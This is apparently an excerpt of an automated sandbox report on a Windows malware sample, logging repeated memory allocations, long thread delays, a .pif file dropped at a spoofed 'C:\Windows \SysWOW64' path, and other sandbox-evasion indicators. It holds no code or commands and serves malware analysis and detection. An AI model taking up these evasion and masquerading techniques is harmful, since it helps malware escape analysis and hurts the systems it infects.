Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory allocated: 2980000 memory commit 500068352
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory allocated: 2981000 memory commit 500154368
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory allocated: 29A6000 memory commit 500002816
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory allocated: 29A7000 memory commit 500068352
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory allocated: 29B7000 memory commit 501014528
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory allocated: 2AAF000 memory commit 500006912
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory allocated: 2AB0000 memory commit 500015104
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Memory allocated: 28A0000 memory commit 500068352	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Memory allocated: 28A1000 memory commit 500154368	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Memory allocated: 28C6000 memory commit 500002816	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Memory allocated: 28C7000 memory commit 500068352	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Memory allocated: 28D7000 memory commit 501014528	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Memory allocated: 29CF000 memory commit 500006912	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Memory allocated: 29D0000 memory commit 500015104	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory allocated: 2AC0000 memory commit 500068352	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory allocated: 2AC1000 memory commit 500154368	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory allocated: 2AE6000 memory commit 500002816	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory allocated: 2AE7000 memory commit 500068352	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory allocated: 2AF7000 memory commit 501014528	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory allocated: 2BEF000 memory commit 500006912	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Memory allocated: 2BF0000 memory commit 500015104	Jump to behavior

Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Memory allocated: 2DD40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Memory allocated: 2E060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Memory allocated: 2DD60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Memory allocated: 1F6A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Memory allocated: 1FA30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Memory allocated: 1F740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Memory allocated: 1EFD0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Memory allocated: 1F220000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Memory allocated: 21220000 memory reserve \| memory write watch

Source: C:\Users\Public\Libraries\fpnevlzQ.pif

7_2_004019F0

Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599780	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598111	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597695	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597499	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597388	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597270	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597153	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596943	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596820	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596706	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596586	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596403	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596247	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596087	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595400	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595069	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594549	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594409	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594265	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594158	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594003	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593877	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593753	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593628	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593503	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593378	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593253	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593128	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593003	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592878	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592753	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592628	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592503	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592378	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592253	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592127	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591815	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591628	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591503	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591378	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591253	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591128	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591003	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598465	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598232	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598116	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597950	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597591	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597455	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597338	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597192	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597067	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596494	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596335	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596127	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595952	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595308	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594830	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594565	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594380	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594255	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594130	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594005	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593880	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593767	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593630	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593505	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593380	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593255	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593130	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593005	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592880	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592755	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592630	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592505	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592380	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592240	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592093	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591934	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591817	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591692	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591568	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591443	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591318	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591193	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591068	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599875
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599765
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599656
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599547
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599437
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599328
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599218
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599109
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599000
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598890
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598780
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598672
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598562
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598453
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598343
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598234
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598125
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598015
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597905
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597796
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597687
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597578
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597468
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597359
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597249
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597140
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597031
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596922
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596812
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596703
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596593
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596484
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596375
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596265
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596156
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596047
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595937
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595828
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595718
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595609
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595500
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595390
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595281
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595172
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595062
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594951
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594843
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594734
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594625

Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Window / User API: threadDelayed 6561	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Window / User API: threadDelayed 3194	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Window / User API: foregroundWindowGot 1557	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Window / User API: threadDelayed 5941	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Window / User API: threadDelayed 3828	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Window / User API: foregroundWindowGot 1591	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Window / User API: threadDelayed 2085
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Window / User API: threadDelayed 7770
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Window / User API: foregroundWindowGot 1593

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe

Dropped PE file which has not been started: C:\Windows \SysWOW64\svchost.pif

Jump to dropped file

Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -599780s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -599563s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -598111s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -597695s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -597499s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -597388s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -597270s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -597153s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -596943s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -596820s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -596706s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -596586s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -596403s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -596247s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -596087s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -595875s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -595400s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -595069s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -594549s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -594409s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -594265s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -594158s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -594003s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -593877s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -593753s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -593628s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -593503s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -593378s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -593253s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -593128s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -593003s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -592878s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -592753s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -592628s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -592503s >= -30000s	Jump to behavior
